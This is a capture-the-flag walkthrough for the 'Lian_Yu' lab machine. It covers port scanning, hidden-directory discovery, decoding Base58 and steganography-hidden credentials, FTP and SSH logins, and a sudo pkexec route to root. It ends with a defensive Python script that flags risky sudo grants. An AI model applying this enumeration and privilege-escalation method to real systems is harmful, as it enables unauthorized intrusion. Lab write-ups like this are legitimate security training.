Lian_Yu
Fuzzing endpoints - Base58 decoding - FTP enumeration - Steg tools - pkexec privesc
Recon
The nmap scan shows the following open ports:
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 43835/tcp6 status
| 100024 1 48319/udp status
| 100024 1 57610/udp6 status
|_ 100024 1 58608/tcp status
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
A first gobuster scan reveals a hidden directory, /island/:
$ curl -s http://10.10.222.216/island/
<!DOCTYPE html>
<html>
<body>
<style>
</style>
<h1> Ohhh Noo, Don't Talk............... </h1>
<p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! -->
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>
</body>
</html>
This reveals a potential username, vigilante (the code word is hidden as white text on the page). A deeper dirsearch scan reveals another directory, /island/2100/:
$ curl -s http://10.10.222.216/island/2100/
<!DOCTYPE html>
<html>
<body>
<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>
<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how? -->
</header>
</body>
</html>
The HTML comment hints that we can "avail" a .ticket here, which means the file we are looking for has a .ticket extension. Either grep the medium.txt wordlist for it or run gobuster with that extension to find the file, green_arrow.ticket. This page leads to:
$ curl -s http://10.10.97.18/island/2100/green_arrow.ticket
This is just a token to get into Queen's Gambit(Ship)
RTy8yhBQdscX
The string is Base58 encoded. Decoding it gives the password !#th3h00d, so together with the username from the island page we have a valid credential pair: vigilante:!#th3h00d
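As an added example (not from the original writeup), here is a minimal Base58 decoder and encoder in Python using the Bitcoin alphabet. It includes a triage check that tells Base58 apart from Base64 (Base58 has no 0, O, I or l and no = padding) and decodes the ticket string above. The ticket value is the one on the page; everything else is constructed for the example.

```python
# Added example: Base58 decode/encode with the Bitcoin alphabet.
# Not part of the original writeup; the ticket value comes from the page.

BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_INDEX = {c: i for i, c in enumerate(BASE58_ALPHABET)}


def looks_like_base58(s: str) -> bool:
    """Triage check: every character is in the Base58 alphabet.
    Base64 strings usually contain 0/O/I/l, '+', '/' or '=' padding,
    none of which are valid Base58, so this quickly separates the two."""
    return bool(s) and all(c in _INDEX for c in s)


def b58decode(s: str) -> bytes:
    """Decode a Base58 string to bytes.

    The string is read as a big-endian base-58 number; leading '1'
    characters map to leading zero bytes (Bitcoin convention)."""
    n = 0
    for c in s:
        if c not in _INDEX:
            raise ValueError(f"invalid Base58 character: {c!r}")
        n = n * 58 + _INDEX[c]
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zeros = len(s) - len(s.lstrip("1"))
    return b"\x00" * leading_zeros + body


def b58encode(data: bytes) -> str:
    """Encode bytes to Base58 (inverse of b58decode)."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = BASE58_ALPHABET[rem] + out
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + out


if __name__ == "__main__":
    ticket = "RTy8yhBQdscX"  # token from green_arrow.ticket on the page
    print("looks like Base58:", looks_like_base58(ticket))
    print("decoded:", b58decode(ticket))
    print("round trip:", b58encode(b58decode(ticket)) == ticket)
```

The decoder treats the whole string as one big integer, which is why Base58 has no fixed block size and no padding character; that absence of padding is the quickest visual tell when triaging an unknown token.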
Enumeration
Logging in to the FTP server with these credentials:
$ ftp 10.10.97.18
Connected to 10.10.97.18 (10.10.97.18).
220 (vsFTPd 3.0.2)
Name (10.10.97.18:unknown): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (10,10,97,18,83,105).
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 May 05 11:10 .
drwxr-xr-x 4 0 0 4096 May 01 05:38 ..
-rw------- 1 1001 1001 44 May 01 07:13 .bash_history
-rw-r--r-- 1 1001 1001 220 May 01 05:38 .bash_logout
-rw-r--r-- 1 1001 1001 3515 May 01 05:38 .bashrc
-rw-r--r-- 1 0 0 2483 May 01 07:07 .other_user
-rw-r--r-- 1 1001 1001 675 May 01 05:38 .profile
-rw-r--r-- 1 0 0 511720 May 01 03:26 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 11:10 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 03:25 aa.jpg
226 Directory send OK.
ftp> get .other_user
local: .other_user remote: .other_user
227 Entering Passive Mode (10,10,97,18,61,173).
150 Opening BINARY mode data connection for .other_user (2483 bytes).
226 Transfer complete.
2483 bytes received in 0.0029 secs (857.39 Kbytes/sec)
ftp> mget *
Analysing the *.png files discloses a passphrase; use it with steg tools to extract the hidden archive. The .other_user text file discloses a potential username, slade:
$ cat .other_user
Slade Wilson was 16 years old when he enlisted in the United States Army, having lied about his age. After serving a stint in Korea, he was later assigned to Camp Washington where he had been promoted to the rank of major. In the early 1960s, he met Captain Adeline Kane, who was tasked with training
Once we have the passphrase we can use it to extract ss.zip:
$ unzip ss.zip
Archive: ss.zip
inflating: passwd.txt
inflating: shado
$ cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.
$ cat shado
M3tahuman
Now log in to the SSH service as slade with the password from shado and grab user.txt.
Privilege Escalation
List the sudo permissions with the sudo -l command:
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
Look up the pkexec binary on GTFOBins and grab the root flag!
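As an added example from the defender's side (not part of the original writeup), here is a small Python audit that parses sudo -l output and flags grants that amount to a root shell, such as the (root) /usr/bin/pkexec entry above. The sample text is the sudo -l output shown on this page; the list of shell-capable binaries is an assumption drawn from general knowledge, not from the page.

```python
# Added example: audit `sudo -l` output for grants that hand out a root shell.
# Not part of the original writeup. The sample below is the output shown on
# the page; SHELL_CAPABLE is an assumed, deliberately short list.
import re
from typing import Dict, List

# Binaries that can launch an arbitrary program (and so a shell) when run as root.
# Assumed list for this example; pkexec is the one granted on this box.
SHELL_CAPABLE = {"pkexec", "bash", "sh", "su", "env", "vim", "python3"}

# One sudoers entry line: "(runas) [TAG: ...] cmd1, cmd2"
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

# Constructed sample: the sudo -l output from the writeup (raw string keeps the \: as-is).
SAMPLE = r"""Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec
"""


def parse_sudo_l(text: str) -> List[Dict[str, str]]:
    """Return one dict per granted command: runas user, tags, command."""
    entries: List[Dict[str, str]] = []
    in_cmds = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True  # everything after this header is a grant
            continue
        if not in_cmds:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()  # "root : root" -> "root"
        for cmd in m.group("cmds").split(","):
            entries.append({
                "runas": runas_user,
                "tags": m.group("tags").strip(),
                "command": cmd.strip(),
            })
    return entries


def audit(entries: List[Dict[str, str]]) -> List[str]:
    """Flag grants that give a root shell: ALL, or a shell-capable binary as root."""
    findings: List[str] = []
    for e in entries:
        cmd = e["command"]
        binary = "ALL" if cmd == "ALL" else cmd.split()[0].rsplit("/", 1)[-1]
        as_root = e["runas"] in ("root", "ALL")
        if as_root and (binary == "ALL" or binary in SHELL_CAPABLE):
            findings.append(f"{cmd} as ({e['runas']}) [{e['tags'] or 'no tags'}]: root shell")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SAMPLE)):
        print("FINDING:", finding)
```

The audit only looks at the runas user and the binary name, so a grant restricted to specific arguments (for example a single systemctl subcommand) is not flagged; reviewing those by hand is still worthwhile, but the entries it does flag are the ones that should never appear in sudoers without a very good reason.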